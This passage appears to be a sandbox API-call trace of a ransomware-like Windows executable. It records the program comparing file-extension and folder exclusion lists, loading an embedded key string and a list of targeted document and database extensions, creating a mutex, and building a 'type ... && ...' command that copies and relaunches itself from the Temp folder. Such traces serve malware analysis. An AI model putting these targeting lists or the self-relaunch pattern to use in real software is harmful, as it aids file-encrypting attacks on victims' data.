3 [0093.984] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JA", cchCount1=2, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.984] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="COM", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.984] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BAT", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.984] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CMD", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.984] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.984] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JS", cchCount1=2, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.984] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CFG", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.985] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DOWNLOAD", cchCount1=8, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.985] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NFO", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.985] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSI", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.985] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHK", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.985] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DMP", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.985] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MUI", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.985] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DUN", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.985] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISP", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.985] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISW", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.985] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CAB", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.985] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EFI", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.985] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.985] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSU", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.985] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.985] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BIN", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.985] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNG", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.985] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT_INFO", cchCount1=12, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.985] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT", cchCount1=7, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.985] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTM", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.985] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTML", cchCount1=4, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.985] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHM", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.985] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LANG", cchCount1=4, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.985] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="STYLE", cchCount1=5, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.985] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MP3", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.985] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FLAC", cchCount1=4, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.985] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OGG", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.985] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WMA", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.985] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GIF", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.985] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JAVA", cchCount1=4, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.985] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CUR", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.985] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ANI", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.985] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_END]", cchCount1=8, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.985] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[ND_START]", cchCount1=10, lpString2="[ND_START]", cchCount2=10) returned 2 [0093.985] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_START]", cchCount1=10, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.985] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AST", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.986] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AFN", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.986] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ELST", cchCount1=4, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.986] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EXE", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.986] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNK", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.986] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTA", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.986] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PEK", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.986] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.986] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B10CKED", cchCount1=7, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.986] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.986] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.986] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="000", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.986] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SYS", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.986] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.986] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.986] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INF", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.986] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.986] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.986] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REG", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.986] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DRV", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.986] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEV", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.986] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PIF", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.986] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MBR", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.986] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INI", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.986] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.986] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LIST", cchCount1=4, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.986] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TTF", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.986] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.986] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JA", cchCount1=2, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.986] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="COM", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.986] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BAT", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.986] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CMD", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.986] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.987] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JS", cchCount1=2, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.987] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CFG", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.987] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DOWNLOAD", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.987] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NFO", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.987] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSI", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.987] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHK", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.987] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DMP", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.987] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MUI", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.987] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DUN", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.987] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISP", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.987] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISW", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.987] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CAB", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.987] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EFI", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.987] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.987] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSU", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.987] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.987] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BIN", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.987] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNG", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.987] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT_INFO", cchCount1=12, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.987] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT", cchCount1=7, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.987] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTM", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.987] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTML", cchCount1=4, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.987] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHM", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.987] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LANG", cchCount1=4, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.987] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="STYLE", cchCount1=5, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.987] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MP3", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.987] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FLAC", cchCount1=4, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.987] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OGG", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.987] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WMA", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.987] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GIF", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.987] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JAVA", cchCount1=4, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.987] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CUR", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.987] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ANI", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.987] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_END]", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.987] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[ND_START]", cchCount1=10, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.987] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\WINDOWS", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.987] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\PROGRAM FILES", cchCount1=14, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.987] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\GAMES", cchCount1=6, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.987] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\APPDATA\\", cchCount1=9, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.987] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\APPLICATION DATA\\", cchCount1=18, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.987] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\LOCAL SETTINGS\\", cchCount1=16, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.988] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\TEMP\\", cchCount1=6, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.988] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\PROGRAMDATA\\", cchCount1=13, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.988] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\BOOT\\", cchCount1=6, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.988] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\MSOCACHE\\", cchCount1=10, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.988] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\DEFAULT USER\\", cchCount1=14, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.988] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\SAMPLE", cchCount1=7, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.988] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\EXAMPLE", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.988] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\I386", cchCount1=5, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.988] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\TEMPORARY", cchCount1=10, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.988] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\TOR BROWSER\\", cchCount1=13, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.988] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\BROWSER", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.988] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BROWSER\\", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.988] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[ND_END]", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 2 [0093.988] GetCurrentThreadId () returned 0xaf0 [0093.988] GetCurrentThreadId () returned 0xaf0 [0093.988] GetCurrentThreadId () returned 0xaf0 [0093.988] FindResourceW (hModule=0x400000, lpName="PRL", lpType=0xa) returned 0x51c498 [0093.988] LoadResource (hModule=0x400000, hResInfo=0x51c498) returned 0x516f58 [0093.988] SizeofResource (hModule=0x400000, hResInfo=0x51c498) returned 0x61 [0093.988] LockResource (hResData=0x516f58) returned 0x516f58 [0093.988] FreeResource (hResData=0x516f58) returned 0 [0093.988] FindResourceW (hModule=0x400000, lpName="CHAK", lpType=0xa) returned 0x51c330 [0093.988] LoadResource (hModule=0x400000, hResInfo=0x51c330) returned 0x50d64c [0093.988] SizeofResource (hModule=0x400000, hResInfo=0x51c330) returned 0x26 [0093.988] LockResource (hResData=0x50d64c) returned 0x50d64c [0093.988] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1361d70, cbMultiByte=38, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0093.988] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1361d70, cbMultiByte=38, lpWideCharStr=0x133de4c, cchWideChar=38 | out: lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P\r\n42\r\n") returned 38 [0093.988] FreeResource (hResData=0x50d64c) returned 0 [0093.988] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0093.988] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x1361d74, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", lpUsedDefaultChar=0x0) returned 32 [0093.988] GetCurrentThreadId () returned 0xaf0 [0093.988] GetCurrentThreadId () returned 0xaf0 [0093.988] GetCurrentThreadId () returned 0xaf0 [0093.988] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12face8, cbMultiByte=97, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 97 [0093.988] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12face8, cbMultiByte=97, lpWideCharStr=0x12b81ec, cchWideChar=97 | out: lpWideCharStr="1CD\r\nDT\r\nDBS\r\nDBF\r\nDBX\r\nMDB\r\nMDF\r\nSDF\r\nACCDB\r\nXLSX\r\nXLS\r\nDOCX\r\nDOC\r\nODS\r\nODT\r\nPDF\r\nJPG\r\nJPEG\r\nTXT") returned 97 [0093.988] CharLowerBuffW (in: lpsz="AST", cchLength=0x3 | out: lpsz="ast") returned 0x3 [0093.988] CharLowerBuffW (in: lpsz="AFN", cchLength=0x3 | out: lpsz="afn") returned 0x3 [0093.988] CharLowerBuffW (in: lpsz="ELST", cchLength=0x4 | out: lpsz="elst") returned 0x4 [0093.988] CharLowerBuffW (in: lpsz="EXE", cchLength=0x3 | out: lpsz="exe") returned 0x3 [0093.988] CharLowerBuffW (in: lpsz="LNK", cchLength=0x3 | out: lpsz="lnk") returned 0x3 [0093.988] CharLowerBuffW (in: lpsz="HTA", cchLength=0x3 | out: lpsz="hta") returned 0x3 [0093.988] CharLowerBuffW (in: lpsz="PEK", cchLength=0x3 | out: lpsz="pek") returned 0x3 [0093.988] CharLowerBuffW (in: lpsz="SEK", cchLength=0x3 | out: lpsz="sek") returned 0x3 [0093.989] CharLowerBuffW (in: lpsz="B10CKED", cchLength=0x7 | out: lpsz="b10cked") returned 0x7 [0093.989] CharLowerBuffW (in: lpsz="TMP", cchLength=0x3 | out: lpsz="tmp") returned 0x3 [0093.989] CharLowerBuffW (in: lpsz="ICO", cchLength=0x3 | out: lpsz="ico") returned 0x3 [0093.989] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe\" 7l6OWDI9Fmrsoy1O" [0093.989] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe\" 7l6OWDI9Fmrsoy1O" [0093.989] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe\" 7l6OWDI9Fmrsoy1O" [0093.989] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe\" 7l6OWDI9Fmrsoy1O" [0093.989] OpenMutexW (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="24MainProcessMutex5") returned 0x0 [0093.989] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName="24MainProcessMutex5") returned 0xb8 [0093.989] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\*.ast", lpFindFileData=0x12f9fc | out: lpFindFileData=0x12f9fc) returned 0xffffffff [0093.989] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0093.989] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\7l6OWDI9Fmrsoy1O.ast" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\7l6owdi9fmrsoy1o.ast"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x40000080, hTemplateFile=0x0) returned 0xbc [0093.989] GetTickCount () returned 0x22caa [0093.990] QueryPerformanceCounter (in: lpPerformanceCount=0x12fc1c | out: lpPerformanceCount=0x12fc1c*=15077875226) returned 1 [0093.990] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbf8, cbMultiByte=1, lpWideCharStr=0x12ebe0, cchWideChar=2047 | out: lpWideCharStr="y\x12ﰘ\x12\x01") returned 1 [0093.990] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbf8, cbMultiByte=1, lpWideCharStr=0x12ebe0, cchWideChar=2047 | out: lpWideCharStr="A\x12ﰘ\x12\x01") returned 1 [0093.990] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbf8, cbMultiByte=1, lpWideCharStr=0x12ebe0, cchWideChar=2047 | out: lpWideCharStr="Q\x12ﰘ\x12\x01") returned 1 [0093.990] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbf8, cbMultiByte=1, lpWideCharStr=0x12ebe0, cchWideChar=2047 | out: lpWideCharStr="b\x12ﰘ\x12\x01") returned 1 [0093.990] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbf8, cbMultiByte=1, lpWideCharStr=0x12ebe0, cchWideChar=2047 | out: lpWideCharStr="5\x12ﰘ\x12\x01") returned 1 [0093.990] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbf8, cbMultiByte=1, lpWideCharStr=0x12ebe0, cchWideChar=2047 | out: lpWideCharStr="Z\x12ﰘ\x12\x01") returned 1 [0093.990] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbf8, cbMultiByte=1, lpWideCharStr=0x12ebe0, cchWideChar=2047 | out: lpWideCharStr="g\x12ﰘ\x12\x01") returned 1 [0093.990] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbf8, cbMultiByte=1, lpWideCharStr=0x12ebe0, cchWideChar=2047 | out: lpWideCharStr="8\x12ﰘ\x12\x01") returned 1 [0093.990] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe", lpszShortPath=0x1299c7c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe") returned 0x36 [0093.990] CharUpperBuffW (in: lpsz="type \"[FROM_PATH]\" > \"[TO_PATH]\" && \"[TO_PATH]\" [PARAMS]", cchLength=0x38 | out: lpsz="TYPE \"[FROM_PATH]\" > \"[TO_PATH]\" && \"[TO_PATH]\" [PARAMS]") returned 0x38 [0093.990] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0093.990] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\", lpszShortPath=0x1299c7c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\") returned 0x24 [0093.990] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"[TO_PATH]\" && \"[TO_PATH]\" [PARAMS]", cchLength=0x63 | out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"[TO_PATH]\" && \"[TO_PATH]\" [PARAMS]") returned 0x63 [0093.990] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0093.990] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\yAQb5Zg8.exe\" && \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\yAQb5Zg8.exe\" [PARAMS]", cchLength=0xb1 | 